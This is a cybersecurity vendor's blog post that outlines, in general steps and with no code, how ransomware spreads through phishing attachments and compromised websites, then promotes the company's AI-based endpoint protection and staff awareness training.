top of page
  • Writer's pictureechoudhury77

How Ransomware Strikes

We predicted in December 2018 about the rise of malware in 2019, especially ransomware. We based our predictions on aggregated threat intelligence and our analysis of threat vectors and vulnerabilities. Half way into 2019, the epic number of high profile ransomware attacks continues to rise.


Let’s take a look at two of the most prevalent and typical ways that businesses and organizations fall victim to this malware, phishing and compromised websites.


The Phishing attack:

  1. 1. Carefully crafted phishing e-mails with an infected attachment are cast out in a wide net. In many cases, these are socially engineered and target specific organizations and businesses. These will cleverly reference “invoice” or “bill” or some sort of document that needs review with a sense of urgency.

  2. An employee or a member of an organization receives the phishing e-mail in their mailbox and sees the attachment.

  3. The employee opens the attachment and allows macros to run, likely thinking it’s necessary in order to view the document.

  4. The attachment runs macros directly in memory, without the user noticing anything unusual.

  5. The macros open a command line, which then runs a Powershell script into memory.

  6. The Powershell script downloads additional scripts and an encryption key.

  7. The new scripts encrypt the data on the computer and moves across file shares and encrypts any documents it can access.

  8. The user is presented with a notice of the attack and instructions on how to pay the ransomware and get the decryption key to unlock the files.


The Compromised Website attack:

  1. An employee browses to a website that’s been compromised and designed to distribute malware.

  2. The website runs code to check for vulnerable applications on the users computer.

  3. Vulnerable applications are exploited to start a command line without the user noticing anything is happening.

  4. The command line runs a Powershell script into memory.

  5. The Powershell script downloads additional scripts and an encryption key.

  6. The new scripts encrypt the data on the computer and moves across file shares and encrypts any documents it can access.

  7. The user is presented with a notice of the attack and instructions on how to pay the ransomware and get the decryption key to unlock the files.

These two attack forms share several similarities, but it’s important to remember that both exploit the weakest links, the human factor and lack of advanced endpoint protection.


Most endpoint protection rely on signatures. Zero-day malware can easily bypass protection software that use signatures to identify and block threats, resulting in infected computers, and some organizations resort to installing multiple protection software which is ineffective, but also causes performance issues. As many have had the misfortune to discover, this approach to protection simply doesn’t work.


Deep-learning AI-based endpoint protection reacts to threats based on malicious behavior, and doesn’t rely only on signatures of existing malware. Encryption activity, like ransomware, is stopped immediately.


Regular cybersecurity awareness training for employees is important in educating the front lines so they’re more conscious about what they click on and play a key part in protecting the organization and its digital assets.


Contact Firestorm Cyber for more information on the world’s best cybersecurity solutions that protect and defend against malware such as ransomware, and how to train your employees on cybersecurity awareness.


Firestorm Cyber is the world’s only Managed Security Service Provider (MSSP) to offer guaranteed protection globally against ransomware with a $1 Million warranty.

19 views0 comments

Comments


bottom of page